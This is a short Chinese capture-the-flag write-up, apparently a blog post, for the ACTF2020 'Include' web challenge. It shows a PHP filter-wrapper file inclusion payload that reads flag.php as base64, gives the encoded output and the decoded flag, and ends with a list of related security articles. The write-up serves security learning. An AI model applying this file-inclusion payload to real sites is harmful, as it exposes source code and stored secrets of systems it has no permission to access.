[ACTF2020 新生赛]Include 1

题目环境:

超链接,点进去看看

你能找到flag吗?

除了这些网页什么都没有,但是不当紧,因为我们有一双善于发现的眼睛👀

F12瞅瞅

无,并无其他

等等URL看了吗?

发现存在一个参数file,并且已经给出flag.php文件了

主题题目名称Include,意为文件包含,大部分文件包含都要用到PHP伪协议

通过PHP伪协议构造payload:
URL/?file=php:filter/read=convert.base64-encode/resource=flag.php

通过PHP伪协议读取flag.php文件,并通过base64编码格式显示出来

想要了解更多PHP伪协议可以看我这篇同类题目,希望对大家的学习有所帮助

fileclude-CTF 解题思路-CSDN博客

回显结果:

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NDAwZjJiYzYtOGI2Mi00NWEyLTg1ZDQtMmVkYzU0MjY4MTU0fQo=

base64解码一把梭

得出flag:
**flag{400f2bc6-8b62-45a2-85d4-2edc54268154}**

相关推荐
宋浮檀s34 分钟前
春秋云镜——CVE-2020-25540
网络·安全·web安全
郑洁文1 小时前
面向Web安全的Python渗透测试系统设计与实现
python·安全·web安全
Latticy1 小时前
内网渗透-Windows RDP凭证的抓取和密码破解
网络·安全·网络安全·内网渗透·内网
大方子2 小时前
【PolarCTF】狗黑子的RCE
网络安全·polarctf
安全小白wula4 小时前
RCE远程代码/命令执行基础讲解
网络·网络安全·渗透测试·rce·web渗透
woniu_buhui_fei4 小时前
常见的网络攻击
web安全
Whoami!8 小时前
01-【医院】双网隔离架构方案
网络安全·拓扑图·信息安全架构
WangX-西石油8 小时前
DVWA靶场Low级别Brute Force学习
学习·web安全·网络安全
quan_泉8 小时前
DIDCTF 2024平航杯-流量分析
网络安全
小熊officer8 小时前
网络渗透(Network Penetration)
网络·安全·web安全